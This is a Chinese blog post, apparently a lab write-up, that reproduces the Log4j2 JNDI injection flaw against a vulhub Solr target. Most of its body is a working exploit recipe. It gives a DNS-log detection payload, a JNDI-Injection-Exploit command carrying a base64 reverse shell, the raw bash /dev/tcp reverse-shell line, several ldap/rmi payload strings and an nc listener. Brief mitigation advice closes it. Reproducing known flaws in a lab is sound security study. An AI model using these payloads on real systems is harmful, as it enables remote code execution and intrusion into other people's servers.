文章目录

  • 0x1 log4j2漏洞简介
  • 0x2 log4j2漏洞验证判断
  • 0x3log4j2漏洞复现利用
  • 0x04 log4j2漏洞修复方式

0x1 log4j2漏洞简介

log4j2原理:

log4j2框架下的lookup服务提供了{}字段解析的功能,传进入的值会被直接解析,jdni服务就会请求远程的服务链接到本地对象,比如rmi和ladp。这时候服务端只要在{}里面调用jndi服务,即可反弹shell到指定服务器中。

0x2 log4j2漏洞验证判断

利用vulhub靶场进行复现

找到靶场的注入点,我们可以发现/solr/admin/cores?这里有个参数可以传参数

利用dnslog构造pyload来判断是否存在log4j漏洞,我这里用dnslog为ceye.io

构造的pyload:
cores?action=${jndi:ldap://${sys:java.version}.i913n8.ceye.io}

利用截图:

漏洞严重成功截图:

存在JNDI注入那么ldap服务端会执行我们传上去的payload然后在ceye.io那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号

0x3log4j2漏洞复现利用

github上一个jndi注入工具:链接如下

https://github.com/d-rn/vulBox/blob/main/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
利用整体步骤:
1.生成shell,并将shell编码成base64
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.104"
2.利用jndi工具得到注入pyload${jndi:ldap://192.168.0.104:1389/bdy3jf}
3.利用nc监听shell端口
nc -lvvp 4444
4.发送生产的pyload
cores?action=${jndi:ldap://192.168.0.104:1389/bdy3jf}
5.得到shell

1.生成shell,并将shell编码成base64

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.104"
参数说明:
base64编码反弹shell脚本。-A参数接vps地址

开始漏洞利用,首先我们构造反弹shell用到的命令:

bash -i >& /dev/tcp/传反弹shell的主机ip/端口号 0>&1
例如:
bash -i >& /dev/tcp/192.168.0.104/4444 0>&1

2.利用jndi工具得到注入pyload

得到注入的pyload,如果反弹不成功,可以多试用几个pyload:

${jndi:rmi://192.168.0.104:1099/bdy3jf}
${jndi:ldap://192.168.0.104:1389/bdy3jf}${jndi:rmi://192.168.0.104:1099/h8unbv}
${jndi:ldap://192.168.0.104:1389/h8unbv}${jndi:rmi://192.168.0.104:1099/x3i6jm}

3.利用nc监听shell端口

nc -lvvp 端口
例如:
nc -lvvp 4444

nc监听的端口则是,反弹shell设置的端口

4.发送生产的pyload
cores?action=${jndi:ldap://192.168.0.104:1389/bdy3jf}

5.得到shell

jndi注入工具又回显

反弹成功的shell

0x04 log4j2漏洞修复方式

1.升级版本

2.临时方案

  • 添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;
  • 在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;
  • JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;
  • 部署使用第三方防火墙产品进行安全防护。

log4j2漏洞简单复现相关推荐

  1. nginx解析漏洞简单复现及修复

    Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...

  2. Log4j2漏洞复现(CVE-2021-44228)

    引言 Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息.Apache Log4j2存在 ...

  3. 一问三不知之log4j2漏洞简析

    1.log4j2漏洞介绍 1.1简介 Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Logback架构 ...

  4. Log4j2漏洞发展历程及解决方案

    背景 最近互联网技术圈最火的一件事莫过于Log4j2的漏洞了.同时也涌现出了各类分析文章,关于漏洞的版本.漏洞的原因.漏洞的修复.程序员因此加班等等. 经常看我文章的朋友都知道,面对这样热门有意思的技 ...

  5. 解决log4j2漏洞遭到挖矿、僵尸进程病毒攻击

    1.前因 在2019年12月份,爆出来的log4j2漏洞,当时可谓满城风雨.当时自己的一个框架刚好从log4j升级到log4j2.按照当时的方案,临时做了修复,但终究还是抵不过残酷的现实,该来的始终还 ...

  6. 再严重的 Log4j2 漏洞也伤害不了 Java

    点击上方"程序猿技术大咖",关注并选择"设为星标" 回复"加群"获取入群讨论资格! 作者丨Erik Costlow 译者丨核子可乐李冬梅 来 ...

  7. MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现

    MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一.简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司 ...

  8. ThinkPHP漏洞总结复现

    ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...

  9. 第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结

     Part1 前言  Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能.目前通用 ...

最新文章

  1. python能够做什么软件-Python能做什么
  2. 2012_01_26
  3. pg数据库与MySQL的count函数_postgresql数据库连接数和状态查询操作
  4. 一张图来看看.NETCore和前后端技术的演进之路
  5. mysql 索引实战
  6. 小鹏吃相难看,消费者难做“鹏”友
  7. Ubuntu-10.04中设置和修改root密码
  8. gradle mysql方言_基于Spring Boot技术栈的博客系统企业级实战教程分享
  9. Visual Studio2012 安装教程
  10. 博士申请 | 美国弗吉尼亚理工大学周大为老师招收图神经网络方向全奖博士生...
  11. 经典案例悬臂梁受力有限元理论与程序设计_《数值计算与程序设计》系列课程之三
  12. 苏轼一生最智慧的20首诗词,不读懂不足以谈人生
  13. 看他如何做到4年2个博士学位,做研究、出书挣钱两不误。
  14. 爬虫基础篇之斗鱼弹幕
  15. 运筹说 第12期 | 佳片推荐之“心灵捕手”
  16. 怎么把视频变成GIF
  17. 有关Windows10中诊断和反馈隐私设置
  18. 锁屏密码锁、图案锁忘记怎么办?简单利用adb删除(部分机型可用)
  19. 南宁市计算机技术专业学校,南宁电脑技术学校有哪些
  20. CPU瞬间飙升170%问题复盘

热门文章

  1. 医用电器和医用电气设备有啥区别?
  2. 利用74161计数器芯片设计二十进制的计数器
  3. android屏幕锁界面,安卓手机屏幕锁设置方法(九个点图案)
  4. Oracle 10g 安装图解教程带oracle clint 连接教程
  5. 分享三个安卓取词翻译软件给你
  6. YOLOv5 环境搭建、 coco128 训练示例 、 详细记录【一文读懂】
  7. TCP/IP、Http、Socket的区别
  8. [Video Transformer] UniFormer:Unified Transformer for Efficient Spatial-Temporal Representation Lear
  9. 从 cs1.5的经典c4入手点亮创客技能树
  10. 陕西法院押送31辆涉案车回陕在山西被交警扣下